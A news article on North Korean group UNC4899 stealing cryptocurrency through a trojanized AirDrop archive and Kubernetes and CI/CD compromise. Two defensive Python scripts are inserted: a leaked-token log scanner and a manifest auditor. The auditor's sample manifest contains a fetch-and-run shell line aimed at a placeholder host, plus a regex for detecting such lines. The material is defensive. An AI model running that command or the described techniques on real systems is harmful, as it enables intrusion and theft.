North Korean UNC4899 Group Breaches Crypto Firm via Trojanized AirDrop File
March 9, 2026 — By Ravie Lakshmanan, The Hacker News
A sophisticated cyberattack attributed to the North Korean state-sponsored threat actor UNC4899 has compromised a cryptocurrency organization, resulting in the theft of millions of dollars in digital assets. The campaign, which unfolded in 2025, combined social engineering, abuse of a peer-to-peer (P2P) file transfer between personal and corporate devices, and cloud exploitation techniques, according to Google Cloud's H1 2026 Cloud Threat Horizons Report.
Attack Vector: From Developer’s Device to Cloud Environment
The initial breach began when UNC4899 operatives deceived a developer at the targeted crypto firm into downloading a trojanized archive disguised as part of an open-source collaboration. The developer transferred this malicious file from their personal device to their corporate workstation using AirDrop, a P2P file-sharing feature.
When the developer opened the archive in an AI-assisted Integrated Development Environment (IDE), embedded Python malware executed and spawned a binary masquerading as the legitimate Kubernetes command-line tool, kubectl. That binary established a backdoor by connecting to an attacker-controlled domain, giving UNC4899 persistent access to the developer's corporate machine.
Escalation and Cloud Compromise
Using the developer's authenticated sessions and harvested credentials, the attackers pivoted from the corporate workstation into the firm's Google Cloud environment. Initial reconnaissance identified a bastion host, whose multi-factor authentication (MFA) policies the attackers modified to guarantee their own access. From there they moved into the Kubernetes pods underpinning the company's infrastructure.
To maintain persistence, UNC4899 used a 'living-off-the-cloud' (LotC) approach: it modified Kubernetes deployment configurations so that every newly created pod automatically ran bash commands that downloaded backdoors.
Further malicious activities included:
- Injecting commands into Kubernetes resources tied to the company’s Continuous Integration/Continuous Deployment (CI/CD) platform to expose service account tokens via logs.
- Acquiring a high-privileged CI/CD service account token enabling privilege escalation and lateral movement.
- Escaping container confinement using privileged pods to implant additional backdoors, ensuring long-term access.
- Conducting extensive reconnaissance focused on customer data management workloads containing sensitive user identities and wallet information.
- Extracting static database credentials stored insecurely within pod environment variables.
- Accessing production databases through Cloud SQL Auth Proxy to alter user accounts, reset passwords, and update MFA seeds for high-value targets.
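The token-exposure step above (commands injected into CI/CD-linked resources so that service account tokens land in logs) is the kind of leak a defender can catch by scanning pipeline output. The following Python scanner is an added example, not code from the report or from The Hacker News: it finds JWT-shaped strings in log lines, decodes the payload without verifying the signature, and reports only those whose subject is a Kubernetes service account, redacting the token in the returned line. The log lines and the token are constructed for the demo; the signature is a placeholder, not a real cluster's.

```python
import base64
import json
import re
from typing import Dict, List, Optional

# A JWT is three base64url segments; a JSON header starting with {"alg"... encodes to a prefix of "eyJ".
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}")


def _b64url_decode(segment: str) -> bytes:
    # base64url in JWTs drops the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def parse_sa_token(token: str) -> Optional[Dict[str, str]]:
    """Return the namespace and service account named in a Kubernetes SA token,
    or None if the JWT is not one. The signature is NOT verified: this is a leak
    detector reading the claims, not an authenticator."""
    try:
        payload = json.loads(_b64url_decode(token.split(".")[1]))
    except ValueError:  # bad base64, bad UTF-8 or bad JSON
        return None
    if not isinstance(payload, dict):
        return None
    parts = str(payload.get("sub", "")).split(":")
    # Kubernetes SA tokens carry sub = system:serviceaccount:<namespace>:<name>
    if len(parts) != 4 or parts[:2] != ["system", "serviceaccount"]:
        return None
    return {"namespace": parts[2], "serviceaccount": parts[3]}


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Report every service account token found in the given log lines."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for match in JWT_RE.finditer(line):
            identity = parse_sa_token(match.group(0))
            if identity is None:
                continue  # some other JWT, not a cluster identity
            findings.append({
                "line": lineno,
                "namespace": identity["namespace"],
                "serviceaccount": identity["serviceaccount"],
                "redacted": line.replace(match.group(0), "<REDACTED-SA-TOKEN>"),
            })
    return findings


def make_constructed_token(namespace: str, name: str) -> str:
    """CONSTRUCTED sample: the claim layout of a Kubernetes SA token with a fake signature."""
    header = _b64url(json.dumps({"alg": "RS256", "kid": "constructed"}).encode())
    payload = _b64url(json.dumps({
        "iss": "https://kubernetes.default.svc.cluster.local",
        "sub": f"system:serviceaccount:{namespace}:{name}",
        "aud": ["https://kubernetes.default.svc.cluster.local"],
        "exp": 4102444800,
    }).encode())
    return f"{header}.{payload}.{_b64url(b'not-a-real-signature-constructed-for-demo')}"


# Constructed CI/CD log excerpt: one leaked cluster identity and one unrelated JWT.
SAMPLE_CI_LOG = [
    "[ci] step 3/5: building image registry.example/payments:1.4.2",
    "[ci] env dump: KUBE_TOKEN=" + make_constructed_token("ci-system", "deployer"),
    "[ci] step 4/5: kubectl apply -f k8s/deployment.yaml",
    "[ci] app login test " + ".".join(
        [_b64url(b'{"alg":"none"}'), _b64url(b'{"sub":"alice"}'), _b64url(b"constructed-signature")]),
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_CI_LOG):
        print(f"line {f['line']}: token for {f['namespace']}/{f['serviceaccount']} -> {f['redacted']}")
```

Run it over exported pipeline logs and alert on any hit; a token in a log is already compromised regardless of who read it, so the follow-up is rotation of that service account's credentials, not just redaction.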
Impact and Lessons Learned
The attackers ultimately used compromised accounts to withdraw several million dollars in cryptocurrency. Google’s security team emphasized that the incident “highlights the critical risks posed by personal-to-corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment.”
The case illustrates the evolving threat landscape where threat actors blend social engineering with cloud-native attack techniques, exploiting DevOps workflows and container orchestration platforms like Kubernetes to escalate privileges and compromise critical infrastructure.
Recommendations to Mitigate Similar Threats
To defend against such attacks, organizations should:
- Implement rigorous defense-in-depth strategies with strong identity validation.
- Enforce policies that restrict or disable peer-to-peer file sharing protocols such as AirDrop or Bluetooth on corporate devices.
- Apply phishing-resistant MFA solutions and context-aware access controls.
- Employ robust secrets management to avoid hardcoding or exposing credentials in environment variables.
- Ensure container runtime environments enforce strong isolation and monitor for abnormal processes.
- Isolate compromised nodes to prevent lateral movement within cloud infrastructures.
- Rely solely on trusted container images and restrict deployment of unauthorized code.
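Several of these recommendations, and the persistence and escalation steps described earlier (startup commands that download backdoors, privileged pods, static credentials in environment variables, untrusted images), can be checked mechanically against workload manifests before they reach a cluster. The audit below is an added example written for this article, not Google's tooling or the victim's configuration. It takes a Deployment already parsed into a dict (for instance from `kubectl get deployment -o json`) and flags the four patterns; the weak and hardened manifests are constructed, and the trusted-registry allow-list is an assumption for the demo.

```python
import re
from typing import Dict, List

# Startup commands that fetch and run remote content: the pattern behind "bash at pod start pulls a backdoor".
FETCH_EXEC_RE = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b")
# Environment variable names that usually carry a credential.
SECRET_NAME_RE = re.compile(r"(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)", re.I)
# ASSUMED allow-list of registries the organization controls.
TRUSTED_REGISTRIES = ("registry.example.internal/",)


def audit_deployment(manifest: Dict) -> List[str]:
    """Return human-readable findings for a Deployment (or any workload with a pod template)."""
    findings: List[str] = []
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    pod = manifest.get("spec", {}).get("template", {}).get("spec", {})
    for c in pod.get("containers", []) + pod.get("initContainers", []):
        where = f"{name}/{c.get('name', '<unnamed>')}"
        # 1. Privileged containers give up the isolation the container was supposed to provide.
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"{where}: privileged container (host escape risk)")
        # 2. command, args and postStart hooks all run at pod start; none should fetch and execute code.
        hook = c.get("lifecycle", {}).get("postStart", {}).get("exec", {})
        startup = " ".join(list(c.get("command", [])) + list(c.get("args", [])) + list(hook.get("command", [])))
        if FETCH_EXEC_RE.search(startup):
            findings.append(f"{where}: startup command fetches and executes remote content")
        # 3. A literal 'value' on a secret-named variable is a static credential readable from the pod spec.
        for env in c.get("env", []):
            if SECRET_NAME_RE.search(env.get("name", "")) and "value" in env:
                findings.append(f"{where}: env {env['name']} holds a literal secret; use valueFrom.secretKeyRef")
        # 4. Images must come from a trusted registry and be pinned by digest, not a mutable tag.
        image = c.get("image", "")
        if not image.startswith(TRUSTED_REGISTRIES):
            findings.append(f"{where}: image {image} not from a trusted registry")
        elif "@sha256:" not in image:
            findings.append(f"{where}: image {image} not pinned by digest")
    return findings


# Constructed weak manifest showing all four patterns (placeholder URL, not a real host).
WEAK = {
    "apiVersion": "apps/v1", "kind": "Deployment",
    "metadata": {"name": "wallet-api"},
    "spec": {"template": {"spec": {"containers": [{
        "name": "api",
        "image": "docker.io/example/wallet-api:latest",
        "command": ["/bin/sh", "-c", "curl -s http://placeholder.invalid/stage.sh | sh; exec /app/server"],
        "securityContext": {"privileged": True},
        "env": [{"name": "DB_PASSWORD", "value": "hunter2"}],
    }]}}},
}

# Constructed hardened counterpart: unprivileged, direct entrypoint, secret by reference, pinned image.
HARDENED = {
    "apiVersion": "apps/v1", "kind": "Deployment",
    "metadata": {"name": "wallet-api"},
    "spec": {"template": {"spec": {"containers": [{
        "name": "api",
        "image": "registry.example.internal/wallet-api@sha256:" + "0" * 64,
        "command": ["/app/server"],
        "securityContext": {"privileged": False, "allowPrivilegeEscalation": False, "runAsNonRoot": True},
        "env": [{"name": "DB_PASSWORD",
                 "valueFrom": {"secretKeyRef": {"name": "wallet-db", "key": "password"}}}],
    }]}}},
}

if __name__ == "__main__":
    for label, m in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_deployment(m) or ["no findings"])
```

The hardened form still references a static database password, only now through a Secret rather than the pod spec; the report's point about secrets management is better served by short-lived, identity-bound database credentials, which this check cannot see from a manifest alone. The same rules translate directly into an admission policy so that a modified deployment is rejected at apply time rather than found later.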
About UNC4899
UNC4899, also known by cryptonyms such as Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor, is a North Korean threat actor linked to state-sponsored cyber espionage and financially motivated attacks targeting cryptocurrency firms and other high-value entities.